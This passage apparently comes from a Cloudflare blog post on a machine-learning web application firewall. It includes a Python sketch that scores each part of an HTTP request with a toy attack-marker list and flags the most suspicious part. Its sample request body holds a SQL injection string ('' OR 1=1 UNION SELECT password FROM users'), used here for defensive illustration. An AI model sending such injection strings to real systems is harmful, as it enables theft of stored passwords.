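from typing import Callable, Dict, Tuple


def score_parts(parts: Dict[str, str], scorer: Callable[[str], int]) -> Dict[str, int]:
    """Score each request part (URI, headers, body, ...) independently."""
    return {name: scorer(content) for name, content in parts.items()}


def most_suspicious(part_scores: Dict[str, int]) -> Tuple[str, int]:
    """Return the part with the lowest score (lowest = most likely malicious)."""
    name = min(part_scores, key=part_scores.__getitem__)
    return name, part_scores[name]


def toy_scorer(text: str) -> int:
    """Stand-in for the real model: counts crude attack markers, 1..99 scale."""
    markers = ("union select", "<script", "' or ")
    hits = sum(marker in text.lower() for marker in markers)
    return max(1, 99 - 45 * hits)


parts = {
    "uri": "/search?q=shoes",
    "headers": "User-Agent: curl/8.0",
    "body": "q=' OR 1=1 UNION SELECT password FROM users",
}
print(most_suspicious(score_parts(parts, toy_scorer)))  # ('body', 9)
```

Reporting the lowest-scoring part, rather than a single score for the whole request, tells the user where to look when reviewing a flagged request.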

This looks easy on paper, but Cloudflare engineers had to solve a number of challenges to get here. These include building a reliable dataset, scaling data labeling, selecting the right model architecture, and running the categorization on every request processed by Cloudflare's global network (i.e. 32 million times per second).

In the coming weeks, the Engineering team will publish a series of blog posts which will give a better understanding of how the solution works under the hood.

In the coming months, we are going to release the new detection engine to customers and collect their feedback on its performance. Long term, we plan to extend the detection engine to cover all attack vectors already identified by managed rules, and to use the attacks blocked by the machine learning model to further improve our managed rulesets.
